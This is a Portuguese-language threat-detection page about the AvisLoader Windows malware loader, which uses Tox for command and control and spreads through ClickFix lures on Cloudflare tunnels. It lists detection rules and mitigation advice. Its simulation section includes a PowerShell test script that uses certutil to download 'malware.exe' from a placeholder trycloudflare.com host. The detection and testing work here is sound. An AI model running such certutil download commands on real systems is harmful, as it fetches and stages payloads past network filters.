AvisLoader Surge como um Carregador Malware Resiliente para Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
AvisLoader é um loader de malware do Windows recém-identificado que utiliza a rede de mensagens peer-to-peer (P2P) Tox para comunicação de comando e controle (C2). Esta abordagem descentralizada permite que os operadores mantenham a conectividade e relocação dos controladores sem depender de domínios fixos ou servidores centralizados. O malware é comumente distribuído por meio de iscas de engenharia social ClickFix hospedadas na infraestrutura Cloudflare.
Investigação
Os Laboratórios de Ameaças da Varonis descobriram o loader em um servidor de staging exposto junto com seu centro de comando e ferramentas relacionadas. A investigação identificou uma isca ClickFix com tema do DocuSign que instrui os usuários a executar comandos que recuperam cargas úteis através dos Túneles Rápidos do Cloudflare. A análise do executável encontrou comunicação C2 baseada em Tox, funcionalidade de bypass do UAC e módulos projetados para ocultar processos maliciosos.
Mitigação
As organizações devem treinar os usuários para reconhecer e reportar solicitações de assinatura de documentos que os instruam a colar comandos em terminais ou no diálogo Executar do Windows. As equipes de segurança devem monitorar o uso suspeito de Workers do Cloudflare e Túneles Rápidos em iscas baseadas na web. Detectar tráfego inesperado da rede peer-to-peer (P2P) e mudanças não autorizadas nos atalhos da área de trabalho também pode ajudar a reduzir o risco.
Resposta
Quando a atividade do AvisLoader é detectada, as equipes de segurança devem revisar a linhagem do processo de shells de comando e interpretadores de script lançados após visitas a domínios suspeitos. Inspecione endpoints em busca de atalhos modificados, .backup arquivos, e o artefato VLCAssistant . A telemetria da rede também deve ser revisada quanto ao tráfego incomum do protocolo Tox originário de hosts afetados.
Fluxo do Ataque
Ainda estamos atualizando esta parte.
Detecções
Executável Suspeito Contendo Apenas Números no Nome (via cmdline)
Comunicação de Domínio Trycloudflare Suspeita (via DNS)
Tentativa de Execução Curl Suspeita [MacOS] (via cmdline)
IOCs (HashSha256) para detectar: Conheça o AvisLoader: Um Loader para Windows Construído para Sobreviver a uma Derrubada
Detectar Tráfego Tox ou Peer-to-Peer Inesperado [Conexão de Rede do Windows]
Detecção de Execução Remota de Código via Shell de Comando e Túnel Rápido do Cloudflare [Criação de Processo do Windows]
Execução de Simulação
-
Narrativa do Ataque & Comandos: Um adversário obteve acesso inicial a uma estação de trabalho. Para manter a persistência e baixar sua carga útil modular secundária, ele utiliza um Túnel Rápido do Cloudflare para contornar o filtragem de saída. O atacante utiliza
certutil.exe, uma utilidade integrada no Windows, para baixar a carga útil dehttps://malicious-tunnel-id.trycloudflare.com/payload.exe. Este método é escolhido porquecertutilé um binário confiável e o tráfego parece estar se dirigindo para uma infraestrutura legítima do Cloudflare, tornando-o menos provável de ser sinalizado por filtros básicos de reputação de rede. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção. # Este usa o certutil para tentar um download de um endereço trycloudflare.com. $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] Simulando atividade do adversário: Baixando de $targetUrl via certutil..." # O seguinte comando é projetado para acionar as condições 'selection_tunnel' E 'selection_tools'. certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] Comando de simulação executado com sucesso." } else { Write-Host "[-] Comando falhou (Esperado se a URL for inexistente, mas a telemetria ainda deve ser gerada)." } -
Comandos de Limpeza:
# Script de limpeza para remover a carga útil simulada e artefatos locais. $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] Limpou $tempFile" } else { Write-Host "[-] Nenhum artefato encontrado para limpar." }